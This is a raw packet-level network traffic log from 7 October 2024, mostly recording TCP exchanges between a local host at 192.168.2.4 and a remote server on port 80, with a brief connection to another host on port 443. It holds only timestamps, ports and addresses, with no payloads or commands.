                                                                                                                                      Oct 7, 2024 03:23:19.080099106 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080171108 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080171108 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080179930 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080190897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080202103 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080213070 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080223083 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080225945 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080234051 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080257893 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080276012 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083000898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083070040 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083081961 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083084106 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083122015 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083158970 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083168983 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083178997 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083204985 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083214045 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083301067 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083311081 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083321095 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083331108 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083342075 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083342075 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083345890 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083364964 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083369970 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083381891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083398104 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083400965 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083406925 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083415031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083415031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083429098 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083441019 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083611965 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083621979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083633900 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083664894 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083682060 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083703995 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083714008 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083725929 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083735943 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083753109 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083775997 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083873034 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083883047 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083894014 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083920002 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083926916 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083934069 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083945036 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083956003 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.083975077 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.083992958 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.084002972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.084012985 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.084014893 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.084048986 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.084065914 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.084235907 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.084245920 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.084255934 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.084265947 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.084279060 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.084305048 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.125922918 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.125967979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.125979900 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.125997066 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126018047 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126023054 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126030922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126039982 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126046896 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126049995 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126080990 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126099110 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126099110 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126111031 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126121044 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126133919 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126146078 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126157999 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126158953 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126166105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126171112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126180887 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126209021 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126249075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126260042 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126269102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126281023 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126288891 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126292944 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126310110 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126312971 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126322031 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126348972 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126348972 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126367092 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.126368999 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.126952887 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.132581949 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:19.132636070 CEST44349893184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.133311033 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:19.134502888 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:19.134535074 CEST44349893184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166766882 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166776896 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166788101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166809082 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.166827917 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166831017 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.166838884 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166850090 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166861057 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166867971 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.166872978 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.166887045 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.166909933 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167007923 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167062044 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167071104 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167087078 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167088985 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167100906 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167108059 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167129040 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167139053 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167182922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167192936 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167202950 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167212963 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167224884 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167224884 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167241096 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167247057 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167259932 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167269945 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167273045 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167284012 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167290926 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167294979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167308092 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167311907 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167319059 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167332888 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167346954 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167378902 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167412043 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167422056 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167432070 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167440891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167452097 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167463064 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167464018 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167484999 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167505026 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167514086 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167531013 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167541981 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167550087 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167553902 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167566061 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167572021 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167578936 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167582035 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167607069 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167694092 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167705059 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167721987 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167732954 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167740107 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167742968 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167752981 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167754889 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167768002 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167778969 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167781115 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167797089 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167805910 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167809010 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167813063 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167819977 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167850971 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167872906 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167891026 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167901039 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167911053 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167922020 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167929888 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167932987 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167956114 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167963028 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167969942 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167973042 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167984009 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.167993069 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.167994976 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168009043 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168025970 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168028116 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168041945 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168071032 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168081045 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168091059 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168102026 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168113947 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168119907 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168129921 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168138027 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168160915 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168169022 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168184042 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168205023 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168225050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168262959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168272018 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168281078 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168293953 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168307066 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168317080 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168332100 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168334961 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168344975 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168354988 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168365002 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168375015 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.168375015 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168396950 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.168420076 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.207704067 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207752943 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.207753897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207766056 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207803011 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.207859993 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207870960 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207881927 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207892895 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207897902 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.207904100 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207911015 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.207914114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207931995 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207931995 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.207942009 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207952976 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207962036 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.207963943 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207976103 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.207978010 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208000898 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208023071 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208031893 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208060026 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208070993 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208081007 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208097935 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208106995 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208117962 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208122015 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208127975 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208138943 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208141088 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208148956 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208165884 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208189964 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208198071 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208208084 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208218098 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208228111 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208233118 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208239079 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.208261013 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.208281994 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.214627981 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214646101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214658022 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214687109 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.214701891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214718103 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.214724064 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214741945 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.214765072 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.214862108 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214871883 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214881897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214891911 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214901924 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214907885 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.214912891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214922905 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214937925 CEST4987980192.168.2.4185.215.113.103
